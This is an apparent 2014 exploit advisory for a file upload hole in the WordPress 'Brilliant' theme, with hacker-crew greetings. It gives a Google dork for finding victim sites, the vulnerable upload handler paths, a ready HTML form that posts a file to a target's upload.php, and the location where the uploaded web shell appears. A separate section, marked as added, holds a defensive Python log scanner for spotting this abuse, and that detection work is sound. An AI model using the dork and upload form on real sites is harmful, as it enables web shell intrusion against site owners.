
WordPress Brilliant Themes CSRF File Upload Vulnerability

Author: AnonBoy, Published: 29-04-2014
############################################################################
# Title : WordPress Brilliant Themes CSRF File Upload Vulnerability
# Author : AnonBoy
# Date : 29/04/2014
# Facebook => https://www.facebook.com/nufailienafratsim.moechtar
# Vendor : N/a
# Google Dork => inurl:/wp-content/themes/brilliant

# Tested on : Windows 7

############################################################################

exploit : /theme/functions/upload-bg.php
/theme/functions/uploadbg.php
/theme/functions/upload.php

<form enctype="multipart/form-data"
action="http://www.target.com/wp-content/themes/brilliant/theme/functions/upload.php" method="post">
<input type="jpg" name="url" value="./" />
Please choose a file: <input name="uploadfile" type="file" />
<input type="submit" value="upload" />
</form>

The shell path will be posted:

Shell Access ===> http://www.target.com/wp-content/themes/brilliant/theme/functions/{random_name_shell.php}
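For site owners checking whether these handlers were used, the following is an added detection example, not part of the original advisory or the theme's code. It assumes the web server writes common/combined access logs; the function name `find_upload_abuse`, the `baseline` set and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directory and upload handlers named in the advisory.
THEME_DIR = "/wp-content/themes/brilliant/theme/functions/"
UPLOADERS = {"upload-bg.php", "uploadbg.php", "upload.php"}

# Common/combined log format: ip - - [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def find_upload_abuse(lines, baseline=UPLOADERS):
    """Return (ip, kind, path) findings for the advisory's directory.
    "upload-post": POST to one of the listed handlers.
    "unexpected-php": HTTP 200 for a .php file in that directory that is not
    in `baseline` (assumption: baseline holds every PHP file a clean copy of
    the theme ships there; extend it from a known-good install).
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Drop the query string and decode %xx so encoded names still match.
        path = unquote(m["path"].split("?", 1)[0])
        idx = path.lower().find(THEME_DIR)
        if idx == -1:
            continue
        name = path[idx + len(THEME_DIR):].lower()
        if "/" in name or not name.endswith(".php"):
            continue
        if name in baseline:
            if m["method"] == "POST":
                findings.append((m["ip"], "upload-post", path))
        elif m["status"] == "200":
            findings.append((m["ip"], "unexpected-php", path))
    return findings

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    f'198.51.100.7 - - [29/Apr/2014:10:01:02 +0000] "POST {THEME_DIR}upload.php HTTP/1.1" 200 41',
    f'198.51.100.7 - - [29/Apr/2014:10:01:09 +0000] "GET {THEME_DIR}a1b2c3.php HTTP/1.1" 200 512',
    f'203.0.113.20 - - [29/Apr/2014:10:02:00 +0000] "GET {THEME_DIR}missing.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE):
        print(finding)
```

A POST finding followed by an unexpected-php finding from the same address is the pattern to triage first; any file it names should be compared against a clean copy of the theme.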
--------------------------------------------------------------------------------------
[#] Greeting ############################################################################################################################ #



./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan ./Gantengers Crew

AND BIG FAMILY OF ACEH CYBER TEAM

##########################################################################################################################################
